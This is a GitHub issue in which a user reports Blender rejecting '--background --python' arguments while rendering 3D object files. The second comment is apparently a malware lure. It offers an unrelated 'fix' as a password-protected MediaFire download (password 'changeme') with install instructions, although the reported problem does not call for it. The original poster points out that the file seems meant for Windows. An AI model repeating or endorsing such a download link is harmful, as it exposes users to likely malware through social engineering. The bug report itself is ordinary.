Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

blender: error: unrecognized arguments: --background --python blender_script.py #51

Open
chenbinghui1 opened this issue Aug 27, 2024 · 2 comments

Comments

@chenbinghui1
Copy link

Hi, I met the following problem:

Handling 3D object files:  36%|████████████████████████████████                                                        | 4/11 [00:02<00:04,  1.46it/s]usage: blender [-h] [--object_path OBJECT_PATH] [--output_dir OUTPUT_DIR]
               [--engine {CYCLES,BLENDER_EEVEE}] [--only_northern_hemisphere]
               [--num_renders NUM_RENDERS]
blender: error: unrecognized arguments: --background --python blender_script.py
2024-08-27 10:34:42.669 | ERROR    | __main__:handle_found_object:165 - Found object https://github.com/mattdeitke/objaverse-xl-test-files/blob/ead0bed6a76012452273bbe18d12e4d68a881956/example-linked.gltf was not rendered successfully!
Handling 3D object files:  45%|████████████████████████████████████████                                                | 5/11 [00:03<00:03,  1.51it/s]usage: blender [-h] [--object_path OBJECT_PATH] [--output_dir OUTPUT_DIR]
               [--engine {CYCLES,BLENDER_EEVEE}] [--only_northern_hemisphere]
               [--num_renders NUM_RENDERS]
blender: error: unrecognized arguments: --background --python blender_script.py
2024-08-27 10:34:43.287 | ERROR    | __main__:handle_found_object:165 - Found object https://github.com/mattdeitke/objaverse-xl-test-files/blob/ead0bed6a76012452273bbe18d12e4d68a881956/example.stl was not rendered successfully!

can some one help me

@amir1387aht
Copy link

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

@chenbinghui1
Copy link
Author

@amir1387aht this file seems like for windows? my env is ubuntu12.04

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants
@chenbinghui1 @amir1387aht and others